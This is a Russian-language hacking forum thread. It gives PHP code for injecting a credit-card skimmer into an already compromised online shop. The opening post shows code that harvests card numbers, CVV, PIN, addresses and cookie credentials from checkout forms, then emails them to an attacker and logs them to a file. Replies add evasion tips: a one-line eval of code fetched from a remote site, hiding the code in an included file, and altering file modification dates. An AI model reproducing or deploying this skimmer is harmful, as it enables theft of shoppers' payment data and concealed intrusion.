Авторизация  
sweet_hack

Перехватываем данные о СС с помошью шелла.

В теме 9 сообщений

Бывают такие ситуации-взломал шоп,залил шелл,картона нету-хранится в другой БД или доступа к БД с картоном неполучить.Тут можно воспользоваться сниффером.Код буду использовать чисто наглядный.Думаю этого вполне хватит.Что нам нужно-шелл на шопе.

PHP код:

$ip = getenv("REMOTE_ADDR");   /Вся эта канитель для подготовки данных из html форм перед отправкой на сервер.
$datamasii=date("D M d, Y g:i a");
$user =  $HTTP_COOKIE_VARS["pizda"];
$pass = $HTTP_COOKIE_VARS["pula"];
$first = $HTTP_POST_VARS['first_name'];
$last = $HTTP_POST_VARS['last_name'];
$adress = $HTTP_POST_VARS['address1'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$country = $HTTP_POST_VARS['country'];
$ph1 = $HTTP_POST_VARS['night_phone_a'];
$ph2 = $HTTP_POST_VARS['night_phone_b'];
$ph3 = $HTTP_POST_VARS['night_phone_c'];
$nameoncard = $HTTP_POST_VARS['nameoncard'];
$nocc = $HTTP_POST_VARS['nocc'];
$cardtype = $HTTP_POST_VARS['cardtype'];
$cvv = $HTTP_POST_VARS['cvv2_number'];
$pin = $HTTP_POST_VARS['pin'];
$ccexp1 = $HTTP_POST_VARS['expdate_month'];
$ccexp2 = $HTTP_POST_VARS['expdate_year'];
$expirat = "{$ccexp2}{$ccexp1}";
$mesaj = "Name on card : $nameoncard
Numbers on Card : $nocc
Expiration Date :
$ccexp1 / $ccexp2
CCV : $cvv
PIN : $pin
Card Type : $cardtype
Country : $country
City : $city
State : $state
Zip : $zip
Adress : $adress
Phone : $ph1 $ph2 $ph3
User : $user
Pass :
$pass
--------------------------------------------------
IP :
$ip
DATE :
$datamasii
";
$db = mysql_connect("savehost", "megauser", "megapass") //Подключаемся к БД на другом серве,дальнейший код нас неинтересует.  

И так,если у нас нету возможности подключиться к этому хосту с нужной нам БД,или по какой другой причине неможем слить картон,ставим сниффер.У сниффера конечно недостаток-будем получать только новый картон,то есть саму БД мы непоимеем images/smilies/frown.gif
Наши манипуляции просты как никогда.
Правим файл,в котором формируются данные для отправки на сервер добавлением кода


PHP код:

mail("[email protected]", "PP : $user $pass", "$mesaj");
$logs=fopen ("logs.txt",'a+');
fwrite($logs,$mesaj);  

Теперь CC будут приходить нам на мыло [email protected] и записываться локально в файл logs.txt.При желании можно сделать хоть отстук в джаб.Все.Полный код


PHP код:

$ip = getenv("REMOTE_ADDR");   /Вся эта канитель для подготовки данных из html форм перед отправкой на сервер.
$datamasii=date("D M d, Y g:i a");
$user =  $HTTP_COOKIE_VARS["pizda"];
$pass = $HTTP_COOKIE_VARS["pula"];
$first = $HTTP_POST_VARS['first_name'];
$last = $HTTP_POST_VARS['last_name'];
$adress = $HTTP_POST_VARS['address1'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$country = $HTTP_POST_VARS['country'];
$ph1 = $HTTP_POST_VARS['night_phone_a'];
$ph2 = $HTTP_POST_VARS['night_phone_b'];
$ph3 = $HTTP_POST_VARS['night_phone_c'];
$nameoncard = $HTTP_POST_VARS['nameoncard'];
$nocc = $HTTP_POST_VARS['nocc'];
$cardtype = $HTTP_POST_VARS['cardtype'];
$cvv = $HTTP_POST_VARS['cvv2_number'];
$pin = $HTTP_POST_VARS['pin'];
$ccexp1 = $HTTP_POST_VARS['expdate_month'];
$ccexp2 = $HTTP_POST_VARS['expdate_year'];
$expirat = "{$ccexp2}{$ccexp1}";
$mesaj = "Name on card : $nameoncard
Numbers on Card : $nocc
Expiration Date :
$ccexp1 / $ccexp2
CCV : $cvv
PIN : $pin
Card Type : $cardtype
Country : $country
City : $city
State : $state
Zip : $zip
Adress : $adress
Phone : $ph1 $ph2 $ph3
User : $user
Pass :
$pass
--------------------------------------------------
IP :
$ip
DATE :
$datamasii
";
mail("[email protected]", "PP : $user $pass", "$mesaj");
$logs=fopen ("logs.txt",'a+');
fwrite($logs,$mesaj);
$db = mysql_connect("savehost", "megauser", "megapass") //Подключаемся к БД на другом серве,дальнейший код нас неинтересует.  

Код взят из фэйка палки,все вышенаписанное сделано от нефигделанья.Кодинг знаю плохо.Надеюсь кому-то будет полезно.Не стал постить в раздел со статьями,так как статьи в этом невижу.

 


Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Цитата


Сообщение от Stormy

спалят за 1-2 дня
Лучше вместо таких неинформациооных высказываний дай развернутый ответ.Почему спалят?Как исправить это?Как улучшить?Как сделать хитрее?

Давайте жить дружно и создадим хороший мануал.



Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я думаю что спалят из-за того что много кода, но это можно обойти - тойсть сократить наш код до 2 строчок



PHP код:

$code = file_get_contents("http://nash.site.com/code.txt");

eval(
$code);  





Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

miki, ты в теме вообще? шелл уже на сайте есть.



sweet_hack, спалят

1 - дата изменения файла

2 - как правило, удается похекать шоп только благодаря уязвимости в самописном движке. самописные движки постоянно усовершенствуются и дописываются создателями. увидев "лишний" код нормальный программист его просто сотрёт, а хороший программист посмотрит по логам апача, где шелл и и его удалит



Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

mrgrek, есть разница когда ты через шел вставишь тонну кода или пару строчек? Мне кажется что есть и очень большая!



Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Дату изминения файла редко,но иногда можно изменить.К тому же сомневаюсь что админ ежедневно пересматривает код во всем двиге.Ему и работы из админки+загребания бабла хватает.



Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Советую размещать код в каком-нибудь "безпалевном файле", который include()'ится в *.php отвечающий за отправку $_POST в БД с СС. Меняйте дату редактирования файлов.

P.S.

Цитата

Сообщение от miki
я думаю что спалят из-за того что много кода, но это можно обойти - тойсть сократить наш код до 2 строчок


PHP код:

$code = file_get_contents("http://nash.site.com/code.txt");
eval(
$code);  

Ещё короче images/smilies/smile.gif


PHP код:
eval(file_get_contents("http://nash.site.com/code.txt"));  

 


Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация